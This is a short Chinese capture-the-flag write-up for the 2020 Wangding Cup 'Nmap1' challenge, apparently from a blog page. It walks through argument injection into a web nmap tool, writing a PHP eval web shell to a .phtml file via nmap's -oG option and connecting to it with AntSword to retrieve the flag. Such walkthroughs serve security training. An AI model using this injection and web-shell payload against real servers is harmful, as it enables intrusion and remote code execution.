命令执行 [网鼎杯 2020 朱雀组]Nmap1

打开题目

输入127.0.0.1

可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令

127.0.0.1 | ls

可以看到|\转义,尝试使用;

直接放入Payload:

' <?php @eval($_POST["hack"]);?> -oG hack.php '

尝试修改文件名后缀为phtml

' <?php @eval($_POST["hack"]);?> -oG hack.phtml '

加上扫描的地址:127.0.0.1

127.0.0.1 | ' <?= @eval($_POST["hack"]);?> -oG hack.phtml'

得到

查看扫描列表:

查看写入的文件,即访问hack.phtml

蚁剑连接

在根目录找到了flag

相关推荐
李新_12 分钟前
基于Markwon封装Markdown组件
android·aigc·markdown
Non-existent9872 小时前
Flutter + FastAPI 30天速成计划自用并实践-第10天-组件化开发实践
android·flutter·fastapi
@老蝴4 小时前
MySQL数据库 - 约束和联合查询
android·数据库·mysql
ljt27249606615 小时前
Compose笔记(六十一)--SelectionContainer
android·笔记·android jetpack
有位神秘人5 小时前
Android中Compose系列之按钮Button
android
AI科技摆渡6 小时前
GPT-5.2介绍+ 三步对接教程
android·java·gpt
csdn12259873366 小时前
Android12 新启动页到底该怎么做
android·启动页
aaajj7 小时前
【Android】关于MY_PACKAGE_REPLACED广播
android
4Forsee8 小时前
【Android】动态操作 Window 的背后机制
android·java·前端
华锋20229 小时前
2025.12首次体验 arkui-x 跨平台开发库
android